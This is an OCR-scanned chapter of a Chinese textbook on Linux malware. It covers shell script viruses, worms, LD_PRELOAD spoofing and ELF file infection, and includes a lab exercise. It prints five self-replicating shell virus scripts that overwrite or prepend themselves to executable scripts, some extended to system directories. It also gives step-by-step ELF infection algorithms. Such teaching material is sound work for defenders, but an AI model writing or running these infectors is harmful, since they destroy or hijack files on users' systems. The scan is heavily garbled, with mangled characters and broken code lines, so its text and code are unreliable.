Administrator 的 身份 来 操作 的 时 候 , 这 些 系统 的 保护 机 制 实际 上 是 没有 用 的 。 一 个 设计 得 


@ 也 有 人 认为 Staog 是 Linux 下 的 第 一 个 病毒 。 其 实 ,Morris 创作 的 蠕虫 更 早 。 
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很 巧妙 的 病毒 可 以 利用 自己 的 方法 来 找到 文件 系统 上 的 每 个 文件 。NT 用 户 或 者 ACL 机 
制 都 没有 很 好 地 重视 这 个 问题 。 

男 一 个 误区 就 是 认为 Linux 系统 尤其 可 以 防止 病毒 的 感染 ,因为 Linux 的 程序 大 多 数 
都 由 源 代 码 直 接 编 译 而 来 ,而 不 是 直接 使 用 二 进 制 格式 。 但 是 这 却 正 是 应 该 重视 的 ,因为 毕 
葛 只 有 极 少 数 的 人 (甚至 管理 员 ) 才 有 足够 的 能 力 来 从 源 代 码 中 发 现 恶意 代码 ,而 且 这 是 一 
个 相当 耗费 时 间 和 精力 的 工作 。 一 般 的 用 户 习 惯 于 用 二 进 制 格式 的 文件 来 交流 ,因为 他 们 
不 想 在 使 用 这 些 程序 的 时 候 还 要 很 烦琐 地 执行 诸如 make 之 类 的 命令 ,他 们 喜欢 很 简单 地 
运行 程序 。 上 述 这 些 原因 就 给 了 Linux 系统 上 的 病毒 有 足够 的 空间 来 访问 和 操控 系统 。 

第 三 个 误区 就 是 认为 Linux 系统 是 绝对 安全 的 ,因为 它 具 有 很 多 不 同 的 平台 ,而 且 每 个 
版 本 的 Linux 系统 有 很 大 的 区 别 。 但 是 现在 不 能 这 样 看 了 。 现 在 的 恶意 代码 都 用 标准 C 
来 编写 以 适应 任何 类 Linux 操作 系统 ,它们 可 以 用 make 程序 来 跨 平 台 编 译 , 并 且 拥 有 标准 
的 ELF 二 进 制 格式 和 库 文 件 。Morris 写 的 Internet 蠕虫 病毒 利用 的 就 是 这 项 技术 。 


4.2 Linux 系统 恶意 代码 的 分 类 


按照 编制 机 理 , 可 以 把 Linux 系统 下 的 恶意 代码 分 为 如 下 类 别 。 

1. Shell 恶意 脚本 

除了 复制 技术 外 ,恶意 代码 面临 的 最 大 技术 难题 就 是 如 何 传播 ,这 是 恶意 代码 天 生 具 有 
的 问题 ,至 少 在 Linux 系统 上 是 如 此 ,因此 需要 想 办 法 解决 平台 兼容 问题 。 所 以 首先 想到 的 
是 Shell 脚本 语言 。Shell 在 不 同 的 Linux 系统 上 的 差别 很 小 。Fred Cohen 在 他 的 书 4 入 侵 
者 , 晴 虫 和 病毒 》( 发 表 于 1990 年 ) 中 写 道 :“ 在 UNIX 的 命令 解释 语言 中 ,病毒 代码 可 以 被 
写 到 200 个 字 节 之 内 。?” 

书写 Shell 恶意 脚本 是 一 个 很 简单 的 制造 Linux 恶意 代码 的 方法 。 但 是 ,脚本 病毒 怎 
么 会 是 真正 的 病毒 呢 ? 它 只 是 用 脚本 语言 来 书写 的 而 不 是 用 汇编 。 实 际 上 ,评定 一 个 程序 
是 病毒 是 因为 它 本 和 号 可 以 在 系统 上 任意 感染 传播 ,而 不 是 这 个 程序 的 大 小 或 者 用 什么 语言 
来 写 。 在 UNIX 1989 卷 2 上 可 以 看 到 Tom Duff 和 M. Douglas Mcllroy 的 恶意 脚本 代码 。 
Shell 恶意 脚本 的 危害 性 不 会 很 大 并 且 它 本 和 号 极 吻 被 发 现 , 因 为 它 是 以 明文 方式 编写 并 执行 
的 ,任何 用 户 和 管理 员 都 可 以 发 觉 它 的 代码 。 通 常 一 个 用 户 会 深信 不 疑 地 去 执行 任何 脚本 ， 
而 且 不 会 过 问 该 脚本 的 由 来 ,这 样 ,它们 就 都 成 为 恶意 脚本 的 目标 。 这 些 都 是 意识 问题 ,这 
样 是 没 办 法 避免 病毒 的 入 侵 的 ,所 以 需要 大 大 加 强 对 这 些 病毒 的 防范 意识 。 

2. 蠕虫 

像 Windows 平台 一 样 ,Linux 平台 也 有 蠕虫 。 先 回忆 一 下 Morris 蠕虫 。 这 个 蠕虫 利 
用 sendmail 程序 已 存在 的 一 个 漏洞 来 获取 其 他 计算 机 的 控制 权 。 蠕 虫 一 般 会 利用 rexec、 
fingerd 或 者 口令 猜 解 来 尝试 连接 。 在 成 功 和 人 侵 之 后 , 它 会 在 目标 计算 机 上 编译 源 代 码 并 且 
执行 它 , 而 且 会 有 一 个 程序 来 专门 负责 隐藏 上 月 己 的 痕迹 。 

晴 虫 一 般 都 是 利用 已 知 的 攻击 程序 去 获得 目标 机 的 管理 员 权 限 , 因 此 蠕虫 的 生命 也 是 
很 短暂 的 。 之 所 以 生命 短暂 是 因为 , 当 它 所 利用 的 漏洞 被 修补 的 话 ,那么 该 肾 虫 也 就 失去 作 
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用 了 。 蚂 虫 需 要 利用 漏洞 来 进行 自身 的 传播 ,而 漏洞 以 及 漏洞 的 利用 一 般 只 针对 特定 版 本 
的 特定 程序 才 有 效 。 如 果 它 所 利用 的 漏洞 被 修补 ,蠕虫 也 会 失去 作用 。 所 以 蠕虫 的 路 平台 
能 力 很 差 ,时效 性 也 很 弱 。 很 显然 ,Linux 系统 下 的 蠕虫 是 专门 针对 该 平台 的 蠕虫 。 

3. 基于 欺骗 库 函 数 恶 意 代码 

Linux 下 的 欺骗 库 困 数 技术 可 以 欺骗 那些 技术 不 高 的 用 户 。 利 用 LD_PRELOAD 环境 
变量 就 可 以 来 捉弄 他 们 ,让 他 们 执行 黑客 的 代码 。 其 骗 方 法 就 是 利用 LD_PRELOAD 环境 
变量 把 标准 的 库 函 数 替 换 成 了 黑客 的 程序 。LD_PRELOAD 并 不 是 Linux 系统 特有 的 ,并 
且 它 一 般 用 在 一 些 应 用 程序 中 (如 旧版 本 的 StarOffice 需要 运行 在 较 新 版 本 的 RedHat 系 
统 上 ), 必 须 用 它们 自己 的 (或 者 比较 旧 的 版 本 ,或 者 修改 过 的 ) 库 函数 ,因为 在 安装 的 时 候 没 
有 满足 它们 的 需求 。 

4. 与 平台 兼容 的 恶意 代码 

如 果 用 标准 C 来 书写 恶意 代码 ,在 各 种 不 同体 系 的 Linux 系统 中 编译 及 运行 变化 不 
大 。 只 要 对 方 计 算 机 有 一 个 gcc 编译 需 ,恶意 代码 就 可 以 很 轻易 地 扩散 。 当 然 ,很 多 恶意 代 
码 都 还 是 用 汇编 来 编写 的 。 当 利用 ELF 格式 的 二 进 制 文件 来 传播 恶意 代码 时 (这 种 恶意 代 
码 被 誉 为 计算 机 病毒 中 的 标准 模式 ,它们 用 汇编 编写 并 且 通 过 可 执行 程序 感染 ) ,就 很 像 典 
型 的 DOS 及 Windows 下 的 恶意 代码 。 可 以 通过 往 ELF 文件 的 文本 段 之 后 的 填充 区 增加 
代码 来 感染 ELF 文件 ,搜索 目录 树 中 文件 的 ET_EXEC 和 ET_DYN 标记 看 看 是 否 被 隐藏 
(这 些 依 靠 管理 员 自 身 的 经 验 )。 

当然 ,在 Linux 系统 下 实现 这 种 恶意 代码 并 不 太 容 易 。 如 果 一 个 恶意 代码 感染 的 文件 
属 主 是 普通 用 户 权 限 , 那 么 它 所 得 到 的 权限 当然 也 就 只 有 普通 用 户 权 限 ,只 能 对 该 用 户 权限 
级 别 的 文件 和 数据 造成 危害 。 但 是 当 一 个 恶意 代码 感染 了 一 个 root 权限 的 文件 时 ,那么 它 
就 可 以 控制 系统 的 一 切 了 。 


4.3 Shell 恶意 脚本 


对 于 Shell 编程 的 程序 员 来 说 所 谓 的 Shell 病毒 技术 其 实 很 简单 ,关于 这 点 在 看 完 本 节 
内 容 后 就 会 有 所 体会 。 但 是 ,简单 归 简 单 , 还 是 要 去 了 解 它 的 工作 方式 。 本 节 最 后 还 设计 了 
Linux 恶意 脚本 的 实验 ,以 帮助 读者 实践 该 类 恶意 代码 。 


4.3.1 Shell 恶意 脚本 编制 技术 


1. 最 原始 的 Shell 恶意 脚本 
下 面 看 一 个 最 原始 的 Shell 恶意 脚本 。 这 段 代 码 虽 然 徐 单 , 但 却 最 能 说 明 问 题 。 


# shellviru I# 

for file in ./infect/* 
do 

cp $0 $file 

done 
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这 段 代码 的 第 一 行 是 注释 行 ,在 这 里 ,用 这 个 功能 作为 防止 重复 感染 的 标记 。 这 段 代 码 
的 功能 是 遍历 当前 目录 中 子 目录 infect 中 的 所 有 文件 ,然后 覆盖 它们 。 如 果 还 认为 威力 不 
够 的 话 , 可 以 用 “for file in * ”来 代替 搜索 语句 ,这 样 就 可 以 遍历 整个 文件 系统 中 的 所 有 文 
件 。 但 是 ,大 家 知道 Linux 是 多 用 户 的 操作 系统 , 它 的 文件 是 具有 保护 模式 的 ,所 以 ,以 上 的 
脚本 有 可 能 会 报 出 一 大 推 的 错误 ,因此 它 可 能 很 快 就 会 被 管理 员 发 现 并 制止 传染 。 接 下 来 ， 
要 为 该 脚本 做 些 基 本 的 条 件 判 断 , 使 其 隐蔽 性 大 大 增强 。 

大 家 知道 ,恶意 代码 制作 的 核心 是 能 够 实现 自我 复制 ,因此 ,该 代码 的 核心 语句 为 


cp $0 $file 


2. 一 个 简单 的 Shell 恶意 脚本 


# shellvirus II 间 

for file in ./infect/* 

do 

if test -f $file // 判 断 是 否 为 文件 
then 

if test ~ x $file // 判 断 是 否 可 执行 
then 

if test ~w $ file // 判 断 是 否 有 写 权 限 
then 

if grep - s echo $file > .mmm // 判 断 是 否 为 脚本 文件 
then 

cp $0 $file // 覆 盖 当 前 文件 

fi 

fi 

fi 

fi 

done 


rm . mmm —f 


这 段 代码 是 对 上 一 个 程序 的 改进 ,这 里 增加 了 若干 的 判断 。 判 断 文件 是 否 存在 ,是 否 可 
执行 ,是 否 有 写 权限 ,是 否 为 脚本 程序 等 。 如 果 判断 条 件 都 为 * 真 ”就 执行 


cp $0 $file 


这 句 代 码 的 功能 是 破坏 该 系统 中 所 有 的 脚本 程序 的 ,危害 性 还 是 比较 大 的 。 


if grep — s echo $ file > /.mmm 


这 人 句 代码 的 功能 就 是 判断 当前 文件 是 否 为 Shell 脚本 程序 。 
这 个 脚本 病毒 一 旦 破坏 完毕 就 什么 也 不 做 了 , 它 没有 像 二 进 制 病毒 那样 的 潜伏 性 。 而 
且 , 以 上 的 脚本 只 是 简单 地 覆盖 宿主 而 已 ,所 以 需要 利用 传统 的 二 进 制 病毒 的 感染 机 制 。 
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3. 具有 感染 机 制 的 Shell 恶意 脚本 


# shellvirus III 间 
井 infection 


head -~ n 35 $0> .testl // 提 取 病 毒 自 身 代 码 并 保存 到 .test 
for file in ./* // 遍 历 当 前 目录 中 的 文件 

do 

echo $ file 

head -nl $file> .mm // 提 取 要 感染 的 脚本 文件 的 第 一 行 
if grep infection .mm > .mmm // 判 断 是 否 有 感染 标记 infection 
then // 已 经 被 感染 , 则 跳 过 


echo "infected file and rm .mm" 

| 

else // 尚 未 感染 ,继续 执行 
i test 一 二 Sfile 

then 

echo "test —f" 

让 teat —x $file 

then 

echo "test —x" 

if test -WwW $file 

then 

echo "test —w" 

if grep —s echo $ file > .mmm 

then 

echo "test —s and cat..." 

cat $ file > .SAVEE // 把 病毒 代码 放 在 脚本 文件 的 开始 部 分 
cat .testl > $ file // 原 有 代码 追加 在 末尾 
cat .SAVEE >> $ file // 形 成 含有 病毒 代码 的 脚本 文件 
3 

EF1 

下 

下 了 

£5 


done 
rm .testl .SAVEE .mmm .mm — f // 清 理工 作 


通过 把 病毒 代码 和 原 有 脚本 组 合 的 方式 ,将 这 段 程序 增加 病毒 的 潜伏 特性 ,原理 非常 容 


易 理 解 。 但 这 段 代码 还 有 个 弱点 , 那 就 是 特别 容易 被 发 现 。 其 实 Shell 脚本 一 般 都 是 明文 
的 ,所 以 容易 被 发 现 。 尽 管 如 此 ,这 段 代码 的 危害 性 已 经 相当 大 了 。 这 段 程序 用 了 一 个 感染 
下 志 infection 来 判断 当前 文件 是 否 已 经 被 感染 ,这 在 程序 中 可 以 反映 出 来 。 


4. 更 加 隆 涩 的 恶意 脚本 
为 了 使 上 面 的 病毒 代码 不 容易 被 发 现 ,必须 修改 它 , 使 它 看 起 来 非常 难 情 。 修 改 的 方法 


有 很 多 ,最 先 考虑 的 技术 肯定 是 精练 代码 ,这 可 以 使 代码 星光 难 收 。 


井 Shel1lVirus IV# 
井 infection 
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for file in./x* ;do // 分 号 (7)) 表 示 命 令 分 隅 符 
if test ~ f $file && test -X $file && test ~w 5$file ; then 
if grep - s echo $ file > /dev/nul ; then 

head -nl $file> .mm 

if grep — s infection .mm > /dev/nul ; then 

rm 一 和 .mm ; else 

head ~ n 14 $0> .SAVEE 

cat $ file >> .SAVEE 

cat .SAVEE > $ file 

Fy FT 

done 

rm —f£ .SAVEE . mm 


现在 恶意 代码 只 会 产生 两 个 临时 文件 了 ,并 且 病 毒 代码 也 被 精简 到 了 14 行 。 当 然 可 以 
用 更 精练 的 方法 把 代码 压缩 到 1 行 或 2 行 。 在 这 里 ,只 是 想 说 明 精 练 代码 问题 ,如 果 读 者 感 
兴趣 ,可 以 目 己 练习 。 

Shell 病毒 代码 还 有 哪些 需要 改进 的 地 方 呢 ? 因为 大 多 数 有 用 的 系统 配置 脚本 都 存放 
在 固定 的 目录 下 (如 根 目 录 、/etc、/bin 等 ) ,所 以 ,病毒 要 感染 这 些 目录 来 增加 其 破坏 力 。 其 
实 实 现 这 个 目的 也 不 难 , 只 要 对 上 述 代码 稍 做 改动 就 可 以 了 。 

5. 感染 特定 目录 的 Shell 恶意 脚本 


ShellVirus Vt 
# infection 


xtemp = $ pwd // 保 存 当 前 路 径 

head ~ n 22 $0>/.testl 

for dir in ./*x ; do // 遍 历 当 前 目录 

if test -d $dir ; then // 如 果 有 子 目 录 则 进入 
cd $ dir 

for file in ./* ; do // 遍 历 该 目录 文件 


if test -ff $file && test -X $file && test -WwW $file ; then 
if grep - s echo $ file > /dev/nul ; then 
head -nl 5$file> .mm 

if grep - s infection .mm > /dev/nul ; then 
rm 一 下 .mm ;) else 

cat $ file > /.SRVEE // 完 成 感染 
cat /.testl > $ file 

cat /.SAVEE >> $ file 

ToT 

done 

4 

fi 

done 

cd $ xtemp 

rm —f/.testl /.SAVEE .mm // 清 理工 作 


这 段 代码 仅仅 感染 了 当前 目录 下 的 一 层 目 录 。 当 然 ,可 以 增加 几 个 循环 ,使 它 感染 更 深 
层 的 目录 。 也 可 以 定位 到 根 目录 ,使 它 感染 根 目录 的 下 层 目录 。 另 外 ,Shell 病毒 还 可 以 做 
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很 多 事情 ,例如 ,下 载 后 门 程序 到 本 机 ,为 计算 机 自动 开 后 门 , 主 动 去 攻击 因特网 中 的 其 他 计 
算 机 ,获取 用 户 的 电子 邮件 来 发 送 染 毒 程序 等 。 总 之 ,恶意 脚本 的 实现 技术 不 高 深 , 但 比较 
实用 。 


4.3.2 Shell 恶意 脚本 实验 


【实验 目的 】 

(1) 了 解 Linux 脚本 型 恶意 代码 的 基本 编制 原理 。 

(2) 了 解 恶 意 脚本 的 感染 与 破坏 机 制 ,进一步 认识 Linux 操作 系统 下 的 恶意 代码 。 

【实验 环境 】 

Red Hat Linux 操作 系统 。 

【实验 步骤 】 

文件 位 置 : 本 书 配套 素材 目录 \ExperimentA LinuxScript。 该 目录 下 共 包 含 v_1. sh、 
v 2.sh、v3.shv 4.sh 和 v 5. sh 等 5 个 Linux 系统 下 的 恶意 脚本 文件 。 复 制 这 些 文件 
到 Linux 系统 。 

(1) 修改 这 些 恶 意 脚 本 为 可 执行 文件 。 

(2) 创建 测试 用 脚本 文件 (如 test. sh) ,根据 病毒 感染 能 力 ,注意 测试 文件 的 属性 、 所 在 
目录 层次 等 。 

(3) 依次 执行 这 5 个 恶意 脚本 ,查看 它们 的 执行 效果 。 

【实验 注意 事项 】 

(1) 本 恶意 脚本 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(2) 本 恶意 脚本 程序 具有 一 定 的 破坏 力 , 做 实验 室 注意 安全 ,推荐 使 用 虚拟 机 环境 。 

(3) Linux 和 Windows 的 编辑 格式 不 一 样 , 当 把 文件 复制 到 Linux 系统 中 时 ,请 注意 编 
辑 格式 。 


4.4 ELF 文件 格式 


可 执行 链接 格式 (Executable and Linkable Format, ELF) 是 UNIX 系统 实验 室 (USL) 
作为 应 用 程序 二 进 制 接口 (Application Binary Interface,ABI) 而 研发 的 。 工 具 接 口 标准 委 
员 会 (Tool Interface Standards,TIS) 选 择 了 正在 发 展 中 的 ELF 标准 作为 工作 在 32 位 Intel 
体系 结构 上 不 同 操作 系统 之 间 可 移植 的 二 进 制 文件 格式 。 

ELF 标准 定义 了 一 个 二 进 制 接口 集合 ,以 文 持 流线型 的 软件 开发 。 这 可 以 减少 不 同 执 
行 接口 实现 的 数量 ,因此 可 以 减少 重新 编程 和 编译 的 需要 。 

ELF 文档 服务 于 不 同 的 操作 系统 上 目标 文件 的 创建 或 者 执行 文件 的 开发 。 它 分 以 下 
3 个 部 分 。 

(1)“ 目 标 文件 ”描述 了 ELF 目标 文件 格式 3 种 主要 的 类 型 。 

(2)“ 程 序 装载 和 动态 链接 ? 摘 述 了 目标 文件 的 信息 和 系统 在 创建 运行 时 程序 的 行为 。 

(3)“C 语言 库 ? 列 出 了 所 有 包含 在 libsys 中 的 符号 、 标 准 的 ANSIC 和 libc 的 运行 程 
序 ,还 有 libc 运行 程序 所 需 的 全 局 的 数据 符号 。 
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4.5 ”ELF 格式 文件 感染 原理 


本 节 分 析 了 多 种 感染 方法 ,由 非 ELF 相关 到 ELF 相关 的 方法 ,由 简单 到 复杂 的 感染 方 
法 ,涉及 大 多 数 Linux 病毒 的 使 用 感染 方法 。 非 ELF 相关 的 感染 方法 主要 有 两 类 , 即 覆 盖 
式 感染 和 追加 式 感染 。ELF 相关 的 感染 方法 ,包括 利用 文本 段 之 后 填充 感染 、 数 据 段 之 后 
插入 感染 、 文 本 段 之 前 插入 感染 、 孙 数 对 其 填充 区 感染 以 及 利用 NOTE 段 等 多 种 感染 方法 。 
LKM 感染 技术 和 PLT/GOT 劫持 感染 技术 是 Linux 病毒 的 高 级 技术 。 


4.5.1 无 关 ELF 格式 的 感染 方法 


无 关 ELF 格式 的 感染 ,可 以 称 为 简单 感染 , 它 并 没有 涉及 任何 可 执行 文件 格式 的 内 容 ， 
直接 使 用 的 是 可 独立 执行 的 病毒 代码 。 多 数 情况 下 这 种 病毒 都 会 破坏 原宿 主 文件 最 终 造成 
原 窒 主 文件 得 不 到 执行 ,这 种 方法 很 容易 被 发 现 ,与 病毒 设计 的 初时 相悖 ,并 且 这 种 破坏 式 
传染 的 病毒 通常 感染 一 个 文件 后 就 很 难 继续 传播 。 因 为 它 一 方面 易 被 发 现 移 除 , 男 一 方面 
造成 大 量 文件 被 破坏 从 而 会 导致 系统 损害 ,得不偿失 。 一 般 情况 下 ,这 种 病毒 可 以 作为 木马 
后 门 病毒 来 使 用 , 当 文 件 执 行 时 间 系 统 添加 后 门 守 护 进 程 ,从 而 进行 远程 控制 或 者 其 他 黑客 
活动 。 

在 本 文中 介绍 的 两 种 简单 感染 方法 只 是 粗略 讲解 大 臻 算法 ,并 且 尽 量 克 服 上 述 感 染 方 
面 的 问题 。 例 如 ,本 文 的 算法 会 将 原宿 主 文件 作为 备份 ,从 而 在 病毒 执行 之 后 交换 控制 权 到 
原宿 主 文件 ,以 尽 可 能 避免 被 检测 到 。 

1. 覆盖 式 感染 

有 些 病毒 会 强行 覆盖 执行 程序 的 某 一 部 分 ,将 自身 代码 舱 入 其 中 ,以 达到 不 改变 被 感染 
文件 长 度 的 目的 ,被 这 样 的 病毒 覆盖 掉 的 代码 无 法 复原 ,从 而 这 种 病毒 是 无 法 被 安全 杀 除 
的 。 病 毒 破坏 了 文件 的 某 些 内 容 , 在 杀 除 这 种 病毒 后 无 法 恢复 文件 的 原貌 。 

在 实际 工作 中 这 类 病毒 的 例子 是 Bliss 病毒 ,这 类 病毒 仍然 保有 恢复 措施 , 即 加 一 定 的 
参数 可 以 恢复 原来 的 宿主 文件 。 

这 种 感染 最 初 的 思路 很 简单 ,就 是 将 病毒 体 直接 复制 到 宿主 文件 中 ,从 开始 部 分 覆盖 宿 
主 文 件 ,一 直到 笨 主 文件 被 感染 成 单纯 的 病毒 体 ,一 般 情况 下 宿主 文件 会 遭 到 破坏 , 香 要 使 
得 在 病毒 执行 后 仍然 交换 控制 权 给 宿主 文件 , 则 需要 给 宿主 文件 备份 ,这 里 的 思路 并 不 复 
杂 , 只 是 将 原宿 主 文 件 复制 到 一 个 隐藏 文件 ,然后 在 病毒 体 执行 完 之 后 执行 宿主 文件 ,使 得 
进程 映像 中 添加 的 是 原宿 主 文件 的 内 容 。 

这 种 感染 方法 存在 strip 的 问题 ,只 需要 使 用 strip 命令 就 可 以 很 容易 地 检测 出 病毒 。 
因为 ELF 头 部 算是 整个 ELF 可 执行 文件 的 路 线 图 ,指定 文件 中 的 合法 部 分 ,由 于 宿主 文件 
剩余 部 分 并 没有 在 ELF 头 中 有 任何 说 明 , 因 此 strip 命令 会 将 其 删除 ,从 而 文件 在 strip 后 
会 变 小 。 由 此 可 见 ,该 种 病毒 虽然 想法 简单 ,实现 简单 ,但 也 是 高 度 不 可 靠 的 。 具 体 的 实现 
算法 (感染 前 后 的 状态 如 图 4-1 所 示 ) 如 下 。 

(1) 扫描 当前 目录 ,查找 可 执行 文件 (也 可 以 进行 小 规模 的 目录 查找 )。 
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(2) 找到 可 执行 文件 test 后 , 先 将 其 复制 一 份 到 隐藏 文件 . test。 

(3) 修改 病毒 体 , 使 病毒 执行 结束 后 能 够 执行 (exec 图 数 ) 文 件 . test, 进 行进 程 映像 蔡 
换 , 即 交还 控制 权 给 箱 主 文件 。 

(4) 复制 病毒 体 到 test, 覆 盖 部 分 宿主 文件 。 

(5) 执行 当前 文件 的 原始 文件 备份 替换 当前 进程 ,完成 原文 件 功 能 ,有 利于 病毒 隐藏 。 

这 种 算法 还 有 其 他 的 缺点 ,就 是 增加 了 额外 的 文件 ,更 加 增 大 了 被 发 现 的 可 能 性 ,因此 ， 
对 于 这 种 覆盖 式 病 毒 , 只 能 说 是 一 个 粗制滥造 的 原型 而 已 。 

本 课题 研究 阶段 简单 实现 了 该 病毒 ,具体 思路 如 上 面 算法 所 描述 ,需要 进行 两 次 编译 ， 
第 一 次 编译 确定 编译 后 的 病毒 文件 大 小 ,然后 修改 原文 件 中 的 相关 宏 定 义 后 青 次 编译 便 获 
得 了 具有 传染 能 力 的 病毒 。 这 种 病毒 能 够 在 执行 病毒 之 后 仍 完成 原来 ELF 文件 的 功效 ,但 
是 增加 了 额外 文件 ,尽管 是 隐藏 文件 ,但 仍然 很 容易 被 发 现 。 所 以 这 种 简单 思路 的 病毒 不 会 
大 规模 传染 , 仅 能 作为 模型 来 研究 。 


2. 追加 式 感染 


追加 式 感 染 最 初 的 思路 也 很 简单 , 同 履 盖 式 感染 方式 不 同 的 是 ,将 病毒 体 直 接 追 加 
到 宿主 文件 中 ,或 者 将 宿主 追加 到 病毒 体 之 后 ,并 不 存在 覆盖 宿主 文件 的 行为 ,从 而 宿主 
文件 被 感染 成 单纯 的 病毒 体 和 原宿 主 文件 的 合体 ,在 病毒 文件 执行 后 将 控制 权 交 还 给 宿 
主 文件 。 

将 宿主 文件 追加 到 病毒 体 尾部 的 方法 不 需要 使 用 到 ELF 文件 格式 的 内 容 , 只 需要 在 病 
毒 体 中 进行 相关 设置 ,即使 病毒 体能 够 知道 自己 的 大 小 ,才能 在 病毒 体 执行 完 后 ,定位 到 宿 
主 文件 开始 处 ,并 读 取 和 宿主 文件 到 临时 文件 ,然后 执行 临时 文件 进行 进程 映像 替换 。 具 体 算 
法 描述 如 下 (人 奶 加 式 感 染 前 后 状态 如 图 4-2 所 示 )。 


图 4-1 覆盖 式 感染 前 后 宿主 文件 状态 图 图 4-2 追加 式 感染 前 后 宿主 文件 状态 图 


感染 过 程 : 

(1) 查找 当前 目录 下 的 可 执行 文件 (也 可 以 进行 小 规模 的 目录 查找 ) 。 

(2) 找到 可 执行 文件 test。 

(3) 修改 病毒 体 ,使 病毒 执行 结束 后 能 够 提取 宿主 文件 到 一 个 新 文件 ,然后 执行 这 个 新 
文件 进行 进程 映像 替换 , 即 交 还 控制 权 给 宿主 文件 。 

(4) 合并 病毒 体 到 test, 不 覆盖 宿主 文件 ,但 放 在 宿主 文件 内 容 之 前 。 

(5) 执行 ,过 程 如 下 。 

中 病毒 体 先 执行 。 
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@ 病毒 体 执 行 完 后 ,找到 病毒 体 尾 部 。 

@) 提取 和 宿主 文件 到 新 文件 。 

出 执行 新 文件 。 

通过 上 面 的 描述 ,这 样 的 感染 仍然 存在 strip 问题 , 它 会 把 宿主 文件 删除 。 原 因 同 上 所 
述 , 因 为 ELF 头 部 是 整个 ELF 可 执行 文件 的 路 线 图 ,指定 文件 中 的 合法 部 分 ,由 于 和 宿主 文 
件 剩 余部 分 并 没有 在 ELF 头 中 有 任何 说 明 , 因 此 strip 命令 会 将 其 删除 ,从 而 文件 在 strip 
后 会 变 小 。 只 需要 使 用 strip 命令 就 很 容易 地 检测 出 这 一 类 病毒 。 因 此 必须 提出 其 他 的 改 
进 方 法 ,如 扩展 一 个 节 来 包含 宿主 文件 ,但 过 大 的 宿主 文件 可 能 会 造成 更 大 的 可 疑 ,并 且 一 
个 节 包 含 整个 可 独立 执行 文件 也 是 不 现实 的 ,至 于 更 深层 次 的 改进 措施 则 需要 ELF 格式 文 
件 的 内 容 分 析 。 

这 种 算法 的 男 一 个 问题 是 会 创建 临时 文件 ,如 果 想 在 宿主 执行 后 消除 临时 文件 , 单 靠 窒 
主 文件 是 不 可 能 的 ,因为 未 对 宿主 进行 任何 修改 ,因此 必须 建立 新 的 进程 来 完成 这 样 的 工 
作 。 一 些 病毒 不 会 清除 创建 的 临时 文件 ,如 8000 和 VLP 病毒 ,另外 一 些 会 创建 额外 的 进程 
删除 临时 文件 ,如 病毒 FILE。 

另外 一 种 方法 是 将 病毒 体 追 加 在 宿主 文件 末尾 处 ,该 方法 的 实现 则 需要 修改 ELF 头 中 
的 相关 项 目 , 如 入 口 点 。 一 种 实现 方法 就 是 修改 入 口 点 使 其 指 问 病毒 体 执行 的 代码 处 ,然后 
病毒 体 执行 结束 后 跳 转 回 原 窒 主 代码 交还 控制 权 , 但 是 这 样 的 ELF 文件 格式 相关 的 内 容 不 
是 本 节 讨 论 的 重点 ,这 个 问题 将 在 下 一 节 中 介绍 。 


3. 实现 与 改进 


对 于 非 ELF 相关 感染 方法 strip 后 会 导致 文件 病毒 体外 多 余 内 容 除 去 的 问题 ,可 以 考 
虑 通过 以 下 几 种 方法 来 解决 。 

(1) 由 于 strip 会 根据 ELF 头 以 及 ELEF 节 头 表 来 判断 应 该 除去 哪些 内 容 , 因 此 ,考虑 的 
是 扩展 最 后 一 节 来 包含 病毒 体外 多 余 的 内 容 。 一 般 的 病毒 体 最 后 一 节 是 . strtab , 即 字符 串 
表 (string table) , 而 病毒 体 要 经 过 strip 后 最 后 一 节 . strtab 以 及 倒数 第 二 节 . symtab 都 将 不 
复 存 在 ,因此 扩展 这 两 节 是 没有 意义 的 。 再 往 上 是 病毒 体 的 节 头 表 (section header table)， 
节 头 表 不 能 扩展 来 包含 多 余 内 容 , 节 头 表 前 面 一 个 节 是 . shstrtab, 即 节 头 表 字符 串 表 
(section header string table) ,现在 就 考虑 扩展 这 一 个 节 来 包含 病毒 体 , 经 过 实验 验证 , 即 增 
大 这 一 节 节 头 的 sh_size 字段 来 包含 多 余 区 域 , 并 把 节 头 表 复 制 到 填充 的 多 余 区 域 之 后 ,最 
后 经 过 strip 测试 ,发 现 仍 然 会 被 删除 。 因 为 strip 的 时 候 对 . shstrtab 这 一 节 也 会 进行 修 
改 , 将 这 一 节 内 的 某 些 内 容 删 除 ,因此 将 多 余 区 域 放 入 这 一 节 也 是 不 现实 的 。 

(2) 再 次 尝试 其 他 的 方法 , 即 扩展 注释 节 。 在 FC6 操作 系统 中 ,使 用 的 是 2. 6. 18-1. 
2798. fc6 的 系统 内 核 , 在 这 个 系统 中 相关 的 位 置 上 只 有 一 个 不 属于 任何 段 的 . comment 节 。 
由 于 扩展 . note. ABI-tag 节 要 移动 过 多 的 节 , 因 为 这 一 节 位 置 处 于 文本 段 中 ,修改 的 地 方 的 
确 太 多 ,在 改进 非 ELF 格式 相关 的 感染 方法 中 得 不 途 失 ,因此 放 径 扩展 这 一 节 。 comment 
节 的 位 置 在 . shstrtab 节 的 前 面 , 可 以 扩展 . comment 节 来 包含 多 余 区 域 , 前 提 是 病毒 体 先 经 
过 strip 处 理 。 

这 次 的 答 试 要 修改 的 地 方 很 多 ,基本 处 理 算 法 如 下 。 

中 修改 . shstrtab 节 头 的 内 容 , 即 修改 sh_offset 字段 ,加 上 多 余 区 域 大 小 。 
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@ 修改 .comment 节 头 的 内 容 , 主 要 修改 sh_size 字段 ,加 上 多 余 区 域 的 大 小 。 

@) 修改 ELF 头 的 内 容 , 即 修改 e_shoff, 加 上 多 余 区 域 的 大 小 。 

由 将 文件 的 节 头 表 和 . shstrtab 节 复 制 到 文件 末尾 。 

在 进行 编程 实现 的 时 候 , 对 于 茶 些 合适 的 文件 ,首先 确定 . comment 节 头 的 sh_name 为 
194, 供 此 来 判断 . comment 节 头 的 位 置 。 但 是 很 多 程序 并 没有 . comment 节 ,因此 便 没 有 办 
法 通过 扩展 . comment 节 来 插入 病毒 代码 。 对 于 这 一 种 方法 ,可 以 成 功 实现 ,但 仅 对 部 分 
ELF 可 执行 文件 有 效 。 

(3) 创建 一 个 新 节 ,来 包含 额外 的 区 域 。 

需要 修改 的 地 方 很 多 ,所 以 算法 也 是 很 复杂 的 。 

Q 修改 ELF 头 内 的 字段 , 即 e_shnum 字段 加 一 。 

@ 创建 节 头 表 内 新 的 表 项 ,附加 到 节 头 表 的 尾部 , 表 项 内 容 为 . comment 节 头 的 复制 ， 
